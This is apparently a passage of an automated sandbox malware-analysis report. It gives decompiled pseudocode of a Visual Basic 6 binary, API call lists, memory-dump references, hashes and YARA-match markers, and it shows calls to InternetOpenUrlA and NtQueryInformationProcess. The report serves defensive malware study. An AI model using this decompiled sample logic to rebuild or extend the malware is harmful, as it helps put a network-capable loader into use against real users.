                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E92A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000120), ref: 0040E95F
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040E9A3
                  • __vbaObjSet.MSVBVM60(0000000B,00000000), ref: 0040E9DC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA0B
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA2F
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B05C,00000060), ref: 0040EA40
                  • __vbaLateMemCall.MSVBVM60(?,IpXl81,00000002), ref: 0040EA58
                  • __vbaFreeObjList.MSVBVM60(00000002,?,0000000B), ref: 0040EA6A
                  • __vbaFreeVar.MSVBVM60 ref: 0040EA75
                  • __vbaFreeObj.MSVBVM60(0040EAA9,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EAA3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Chkstk$CheckHresultNew2$#538#557CallLateList
                  • String ID: IpXl81$Pt
                  • API String ID: 2856081814-2191937191
                  • Opcode ID: ee265e54bdda5ff4e069fd9a53067b64a4abcc3975de78f6b81072115670497a
                  • Instruction ID: 02b73d5a201f6b754b62a1c2fd42f9a7f1313c4de20a9b19c00eec995f72fbea
                  • Opcode Fuzzy Hash: ee265e54bdda5ff4e069fd9a53067b64a4abcc3975de78f6b81072115670497a
                  • Instruction Fuzzy Hash: ED512B74E00208DFDB10DFA1C846BDEBBB4BF08704F1044AAF505BB2A2D7B959959F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E0040EC36(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v32;
                  				signed int _v36;
                  				char _v40;
                  				long long _v48;
                  				char _v56;
                  				intOrPtr _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				char _v88;
                  				intOrPtr _v96;
                  				char _v104;
                  				intOrPtr _v112;
                  				char _v120;
                  				intOrPtr _v128;
                  				char _v136;
                  				intOrPtr _v144;
                  				char _v152;
                  				void* _v252;
                  				signed int _v256;
                  				signed int _v268;
                  				intOrPtr* _v272;
                  				signed int _v276;
                  				signed int _t74;
                  				char* _t78;
                  				char* _t82;
                  				signed int _t86;
                  				void* _t116;
                  				void* _t118;
                  				intOrPtr _t119;
                  
                  				_t119 = _t118 - 0xc;
                  				 *[fs:0x0] = _t119;
                  				L004012A0();
                  				_v16 = _t119;
                  				_v12 = 0x401268;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                  				_v48 =  *0x401260;
                  				_v56 = 5;
                  				_t74 =  &_v56;
                  				_push(_t74);
                  				L00401348();
                  				L0040145C();
                  				_push(_t74);
                  				_push(L"Double");
                  				L00401360();
                  				asm("sbb eax, eax");
                  				_v252 =  ~( ~( ~_t74));
                  				L00401462();
                  				L00401450();
                  				_t78 = _v252;
                  				if(_t78 != 0) {
                  					_v144 = 0x80020004;
                  					_v152 = 0xa;
                  					_v128 = 0x80020004;
                  					_v136 = 0xa;
                  					_v112 = 0x80020004;
                  					_v120 = 0xa;
                  					_v96 = 0x80020004;
                  					_v104 = 0xa;
                  					_v80 = 0x80020004;
                  					_v88 = 0xa;
                  					_v64 = 0x80020004;
                  					_v72 = 0xa;
                  					if( *0x410010 != 0) {
                  						_v272 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v272 = 0x410010;
                  					}
                  					_t82 =  &_v40;
                  					L004013CC();
                  					_v252 = _t82;
                  					_t86 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x2fc))( *_v272));
                  					asm("fclex");
                  					_v256 = _t86;
                  					if(_v256 >= 0) {
                  						_v276 = _v276 & 0x00000000;
                  					} else {
                  						_push(0x50);
                  						_push(0x40b05c);
                  						_push(_v252);
                  						_push(_v256);
                  						L004013D8();
                  						_v276 = _t86;
                  					}
                  					_v268 = _v36;
                  					_v36 = _v36 & 0x00000000;
                  					_v48 = _v268;
                  					_v56 = 8;
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push( &_v120);
                  					_push( &_v104);
                  					_push( &_v88);
                  					_push( &_v72);
                  					_push( &_v56);
                  					L00401342();
                  					L0040145C();
                  					L004013D2();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push( &_v120);
                  					_push( &_v104);
                  					_push( &_v88);
                  					_push( &_v72);
                  					_t78 =  &_v56;
                  					_push(_t78);
                  					_push(7);
                  					L00401432();
                  				}
                  				asm("wait");
                  				_push(E0040EEA5);
                  				L00401462();
                  				return _t78;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EC54
                  • #591.MSVBVM60(00000005), ref: 0040EC8C
                  • __vbaStrMove.MSVBVM60(00000005), ref: 0040EC96
                  • __vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 0040ECA1
                  • __vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 0040ECB8
                  • __vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 0040ECC0
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040ED44
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ED7D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000050), ref: 0040EDC1
                  • #596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE14
                  • __vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE1E
                  • __vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE26
                  • __vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE4F
                  • __vbaFreeStr.MSVBVM60(0040EEA5,Double,00000000,00000005), ref: 0040EE9F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$#591#596CheckChkstkHresultListNew2
                  • String ID: Double$Pt
                  • API String ID: 3707479433-1435507758
                  • Opcode ID: 65c0c2689de41ec36c7da5d5632dba7a04ed8fddff8a8b13d506702fd459a7d4
                  • Instruction ID: e123f40181fab5efb77983bbf84d1d60078e622ed8c2ac08e50f37e13e11cf74
                  • Opcode Fuzzy Hash: 65c0c2689de41ec36c7da5d5632dba7a04ed8fddff8a8b13d506702fd459a7d4
                  • Instruction Fuzzy Hash: 625108B194021DDBDB21DF91D985BDEB7B8FF08304F2081AAE109B71A1DBB85A84CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E0040E1A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a40, void* _a48) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v24;
                  				void* _v40;
                  				void* _v56;
                  				void* _v60;
                  				char _v76;
                  				char* _v100;
                  				char _v108;
                  				intOrPtr _v116;
                  				char _v124;
                  				signed int _v128;
                  				signed int _v136;
                  				signed int _t42;
                  				signed int _t43;
                  				intOrPtr _t65;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t65;
                  				_push(0x74);
                  				L004012A0();
                  				_v12 = _t65;
                  				_v8 = 0x4011e8;
                  				L004013E4();
                  				L00401420();
                  				L004013E4();
                  				L00401420();
                  				_v100 =  &_v24;
                  				_v108 = 0x4008;
                  				_push(1);
                  				_push( &_v108);
                  				_push( &_v76);
                  				L0040138A();
                  				_v116 = 0x40b108;
                  				_v124 = 0x8008;
                  				_push( &_v76);
                  				_t42 =  &_v124;
                  				_push(_t42);
                  				L004013F0();
                  				_v128 = _t42;
                  				L00401450();
                  				_t43 = _v128;
                  				if(_t43 != 0) {
                  					_t43 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                  					_v128 = _t43;
                  					if(_v128 >= 0) {
                  						_v136 = _v136 & 0x00000000;
                  					} else {
                  						_push(0x718);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v128);
                  						L004013D8();
                  						_v136 = _t43;
                  					}
                  				}
                  				_push(E0040E2C1);
                  				L00401462();
                  				L00401450();
                  				L00401450();
                  				L00401462();
                  				return _t43;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E1C0
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1D8
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1E3
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1EE
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E1FB
                  • #619.MSVBVM60(?,00004008,00000001), ref: 0040E217
                  • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E232
                  • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E23E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AD54,00000718), ref: 0040E272
                  • __vbaFreeStr.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2A3
                  • __vbaFreeVar.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2AB
                  • __vbaFreeVar.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2B3
                  • __vbaFreeStr.MSVBVM60(0040E2C1,?,?,?,00004008,00000001), ref: 0040E2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Copy$#619CheckChkstkHresult
                  • String ID: ABC
                  • API String ID: 4030740960-2743272264
                  • Opcode ID: 8455290b6a2ce3b49f68dd43f756e48581f6039460372c5a1c969970c51724a0
                  • Instruction ID: 29939df5dada041200be1e29192ee8797351772dc35cb9b831b840ca295006ee
                  • Opcode Fuzzy Hash: 8455290b6a2ce3b49f68dd43f756e48581f6039460372c5a1c969970c51724a0
                  • Instruction Fuzzy Hash: EF31E670800209ABDB10EFA2C986ADDBBB8EF04748F50446EF505B71A2DB786A45CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 47%
                  			E0040E2D4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                  				intOrPtr _v12;
                  				long long* _v16;
                  				char _v44;
                  				char _v48;
                  				intOrPtr _v56;
                  				char _v64;
                  				intOrPtr _v72;
                  				char _v80;
                  				void* _v116;
                  				signed int _v120;
                  				signed int _v124;
                  				signed int _v136;
                  				intOrPtr* _v140;
                  				signed int _v144;
                  				signed char _v148;
                  				signed long long _v156;
                  				signed long long _v160;
                  				signed int _v164;
                  				signed int* _t60;
                  				char* _t67;
                  				char* _t71;
                  				signed int _t75;
                  				signed char _t76;
                  				signed int _t80;
                  				intOrPtr _t86;
                  				void* _t92;
                  				long long* _t93;
                  				void* _t94;
                  				intOrPtr* _t95;
                  				signed long long _t98;
                  				signed long long _t100;
                  
                  				_t93 = _t92 - 0xc;
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t93;
                  				L004012A0();
                  				_v16 = _t93;
                  				_v12 = 0x401210;
                  				_t60 = _a8;
                  				 *_t60 =  *_t60 & 0x00000000;
                  				_v72 = 0x80020004;
                  				_v80 = 0xa;
                  				_v56 = 0x80020004;
                  				_v64 = 0xa;
                  				_push( &_v80);
                  				_push( &_v64);
                  				_t98 =  *0x401208;
                  				 *_t93 = _t98;
                  				asm("fld1");
                  				 *_t93 = _t98;
                  				asm("fld1");
                  				 *_t93 = _t98;
                  				L0040137E();
                  				L00401384();
                  				asm("fcomp qword [0x401200]");
                  				asm("fnstsw ax");
                  				asm("sahf");
                  				if( *_t60 == 0) {
                  					_v136 = _v136 & 0x00000000;
                  				} else {
                  					_v136 = 1;
                  				}
                  				_v116 =  ~_v136;
                  				_push( &_v80);
                  				_push( &_v64);
                  				_push(2);
                  				L00401432();
                  				_t94 = _t93 + 0xc;
                  				_t67 = _v116;
                  				if(_t67 == 0) {
                  					L16:
                  					asm("wait");
                  					_push(E0040E510);
                  					return _t67;
                  				} else {
                  					if( *0x410010 != 0) {
                  						_v140 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v140 = 0x410010;
                  					}
                  					_t86 =  *((intOrPtr*)( *_v140));
                  					_t71 =  &_v44;
                  					L004013CC();
                  					_v116 = _t71;
                  					_t75 =  *((intOrPtr*)( *_v116 + 0x58))(_v116,  &_v48, _t71,  *((intOrPtr*)(_t86 + 0x31c))( *_v140));
                  					asm("fclex");
                  					_v120 = _t75;
                  					if(_v120 >= 0) {
                  						_v144 = _v144 & 0x00000000;
                  					} else {
                  						_push(0x58);
                  						_push(0x40b07c);
                  						_push(_v116);
                  						_push(_v120);
                  						L004013D8();
                  						_v144 = _t75;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push(_v48);
                  					_t76 =  &_v64;
                  					_push(_t76);
                  					L004013BA();
                  					_t95 = _t94 + 0x10;
                  					_push(_t76);
                  					L004013B4();
                  					_v148 = _t76;
                  					asm("fild dword [ebp-0x90]");
                  					_v156 = _t98;
                  					_t100 = _v156 *  *0x4011f8;
                  					asm("fnstsw ax");
                  					if((_t76 & 0x0000000d) != 0) {
                  						goto L1;
                  					} else {
                  						_v160 = _t100;
                  						 *_t95 = _v160;
                  						_t80 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t86);
                  						asm("fclex");
                  						_v124 = _t80;
                  						if(_v124 >= 0) {
                  							_v164 = _v164 & 0x00000000;
                  						} else {
                  							_push(0x84);
                  							_push(0x40ad24);
                  							_push(_a4);
                  							_push(_v124);
                  							L004013D8();
                  							_v164 = _t80;
                  						}
                  						_push( &_v48);
                  						_t67 =  &_v44;
                  						_push(_t67);
                  						_push(2);
                  						L004013C6();
                  						L00401450();
                  						goto L16;
                  					}
                  				}
                  				L1:
                  				return __imp____vbaFPException();
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E2F2
                  • #677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E347
                  • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E34C
                  • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040E385
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,004012A6), ref: 0040E3AC
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3E5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,00000058), ref: 0040E414
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E433
                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,004012A6), ref: 0040E43C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401210,0040AD24,00000084), ref: 0040E4A2
                  • __vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 0040E4C0
                  • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004012A6), ref: 0040E4CB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$CheckHresultList$#677CallChkstkLateNew2
                  • String ID: Pt
                  • API String ID: 1795533351-3089937733
                  • Opcode ID: 86c05a835eb629afac8e2437cfea9062a77e1098bdfe7967f973c3a899115a02
                  • Instruction ID: 35a1c28e5c63373f501b984e4443b7a9a9eac339cb8e691ffe0c04b58caaec1e
                  • Opcode Fuzzy Hash: 86c05a835eb629afac8e2437cfea9062a77e1098bdfe7967f973c3a899115a02
                  • Instruction Fuzzy Hash: 11514970900208EFDB20DFA1CC45BADBBB8FB08704F1085AAF545B72A2DB785994DF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E0040EECC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* _v36;
                  				void* _v52;
                  				char _v56;
                  				intOrPtr _v64;
                  				intOrPtr _v72;
                  				intOrPtr* _v76;
                  				signed int _v80;
                  				intOrPtr* _v88;
                  				signed int _v92;
                  				char* _t35;
                  				signed int _t39;
                  				intOrPtr _t58;
                  
                  				_push(0x4012a6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t58;
                  				_push(0x48);
                  				L004012A0();
                  				_v12 = _t58;
                  				_v8 = 0x401278;
                  				L004013E4();
                  				L004013E4();
                  				if( *0x410010 != 0) {
                  					_v88 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v88 = 0x410010;
                  				}
                  				_t35 =  &_v56;
                  				L004013CC();
                  				_v76 = _t35;
                  				_v64 = 1;
                  				_v72 = 2;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t39 =  *((intOrPtr*)( *_v76 + 0x17c))(_v76, 0x10, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x314))( *_v88));
                  				asm("fclex");
                  				_v80 = _t39;
                  				if(_v80 >= 0) {
                  					_v92 = _v92 & 0x00000000;
                  				} else {
                  					_push(0x17c);
                  					_push(0x40b06c);
                  					_push(_v76);
                  					_push(_v80);
                  					L004013D8();
                  					_v92 = _t39;
                  				}
                  				L004013D2();
                  				_push(E0040EFD6);
                  				L00401450();
                  				L00401450();
                  				return _t39;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EEE7
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EEFF
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EF0A
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,004012A6), ref: 0040EF22
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF4F
                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 0040EF68
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,0000017C), ref: 0040EF9F
                  • __vbaFreeObj.MSVBVM60 ref: 0040EFB0
                  • __vbaFreeVar.MSVBVM60(0040EFD6), ref: 0040EFC8
                  • __vbaFreeVar.MSVBVM60(0040EFD6), ref: 0040EFD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Chkstk$CheckHresultNew2
                  • String ID: Pt
                  • API String ID: 2096563423-3089937733
                  • Opcode ID: c5d88c32e3a4906ba1a900f2f66201febdc2e7ae4db930a0aeff1a3624b5e2f3
                  • Instruction ID: 8ca2f5a4e7a352638af0284ca2a6d4e4ea40d2a3f30cac5116863914f5c2030b
                  • Opcode Fuzzy Hash: c5d88c32e3a4906ba1a900f2f66201febdc2e7ae4db930a0aeff1a3624b5e2f3
                  • Instruction Fuzzy Hash: 2D310C70910208AFDB10EFD2D845BDDBBB5AF08708F60446AF401BB2E1C7BD6955DB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0040E77F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v28;
                  				signed int _v32;
                  				signed int _v44;
                  				signed int _t26;
                  				void* _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  
                  				_t40 = _t39 - 0xc;
                  				 *[fs:0x0] = _t40;
                  				L004012A0();
                  				_v16 = _t40;
                  				_v12 = 0x401230;
                  				_v8 = 0;
                  				_t26 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012a6, _t37);
                  				L00401420();
                  				_push(0);
                  				_push(0xffffffff);
                  				_push(1);
                  				_push(0);
                  				_push(0x40b168);
                  				_push(_v28);
                  				L00401366();
                  				L0040145C();
                  				_push(_v28);
                  				_push(0x40b170);
                  				L00401360();
                  				if(_t26 != 0) {
                  					_t26 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                  					_v32 = _t26;
                  					if(_v32 >= 0) {
                  						_v44 = _v44 & 0x00000000;
                  					} else {
                  						_push(0x718);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v32);
                  						L004013D8();
                  						_v44 = _t26;
                  					}
                  				}
                  				_push(E0040E83F);
                  				L00401462();
                  				return _t26;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E79B
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E7C7
                  • #712.MSVBVM60(?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7DC
                  • __vbaStrMove.MSVBVM60(?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7E6
                  • __vbaStrCmp.MSVBVM60(0040B170,?,?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7F3
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401230,0040AD54,00000718), ref: 0040E823
                  • __vbaFreeStr.MSVBVM60(0040E83F,0040B170,?,?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E839
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$#712CheckChkstkCopyFreeHresultMove
                  • String ID: cer
                  • API String ID: 1147057769-324084633
                  • Opcode ID: 217c8a660729f025afb7e632096ff29c3c6335644ace3542bb9c3f98f6e23d6c
                  • Instruction ID: 919cfb5bc7367eb94ed625980aad82c460f18649fb504d447c6704233d38f523
                  • Opcode Fuzzy Hash: 217c8a660729f025afb7e632096ff29c3c6335644ace3542bb9c3f98f6e23d6c
                  • Instruction Fuzzy Hash: CF113A70940208ABDB00AFA6C846F9E7FB4EF04754F50807AF501BB2E1D77C5941CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E0040EFE9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v44;
                  				intOrPtr _v52;
                  				char _v60;
                  				char _v76;
                  				intOrPtr _v116;
                  				char _v124;
                  				short _v128;
                  				short _t30;
                  				short _t33;
                  				void* _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  
                  				_t40 = _t39 - 0xc;
                  				 *[fs:0x0] = _t40;
                  				L004012A0();
                  				_v16 = _t40;
                  				_v12 = 0x401288;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012a6, _t37);
                  				 *_a8 =  *_a8 & 0x00000000;
                  				_v52 = 0x20;
                  				_v60 = 2;
                  				_push( &_v60);
                  				_push(1);
                  				_push( &_v76);
                  				L0040133C();
                  				_v116 = 0x40b1f8;
                  				_v124 = 0x8008;
                  				_push( &_v76);
                  				_t30 =  &_v124;
                  				_push(_t30);
                  				L004013F0();
                  				_v128 = _t30;
                  				_push( &_v76);
                  				_push( &_v60);
                  				_push(2);
                  				L00401432();
                  				_t33 = _v128;
                  				if(_t33 != 0) {
                  					_push(0x42);
                  					L00401336();
                  					_v44 = _t33;
                  				}
                  				_push(E0040F0C0);
                  				return _t33;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F005
                  • #607.MSVBVM60(?,00000001,00000002), ref: 0040F047
                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F062
                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F075
                  • #570.MSVBVM60(00000042,?,?,004012A6), ref: 0040F087
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$#570#607ChkstkFreeList
                  • String ID:
                  • API String ID: 1644359802-3916222277
                  • Opcode ID: 9c0205df95720f175c2858b1f563e4fcca3c15fb55040717ea60e9c40e41a146
                  • Instruction ID: 50c39619844336a050a2371089a7c28eb76d73e92f075d033616882efe5f5ad2
                  • Opcode Fuzzy Hash: 9c0205df95720f175c2858b1f563e4fcca3c15fb55040717ea60e9c40e41a146
                  • Instruction Fuzzy Hash: 1511B9B1900208ABDB10DFE5C846BDEBBB8FF04744F50417AF904FB692D77895498B99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: wininet.dll
                  • API String ID: 2994545307-3354682871
                  • Opcode ID: 16f269681e764c592b752724ac3072896f054db6e9d5b22b3ef760ad6485cea0
                  • Instruction ID: 05f48ffd8c9c336f459d507f1973525c9576148e4be8878290f6ce71e834e9ae
                  • Opcode Fuzzy Hash: 16f269681e764c592b752724ac3072896f054db6e9d5b22b3ef760ad6485cea0
                  • Instruction Fuzzy Hash: FB01B632690701CFC710DAF4CC876C137E0AB07318B3D869885648B225F6AF62B58B86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InternetOpenA.WININET(012132E4,00000000,00000000,00000000,00000000), ref: 01212D4B
                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01212DD7
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InternetOpen
                  • String ID:
                  • API String ID: 2038078732-0
                  • Opcode ID: 6cda7b0bde7c5795b966707a813945f20dc042889e023d4ca8f4092383a50d4d
                  • Instruction ID: 378886008fda796626520e076577c5df2f2fc61f01283c4cf2aa67abdedda82b
                  • Opcode Fuzzy Hash: 6cda7b0bde7c5795b966707a813945f20dc042889e023d4ca8f4092383a50d4d
                  • Instruction Fuzzy Hash: 3D317E3025028BEFEB34CE14CD42FFE3AE5AF24340F648525BE0EAA198D77195449B10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: fd01225522cb96142988643e802517d5df111cc3aa413f62ea7e0871550a8928
                  • Instruction ID: 58c8f1d86a5ccfcebf169e07122f5e105022942f25348a5601997edc4d584534
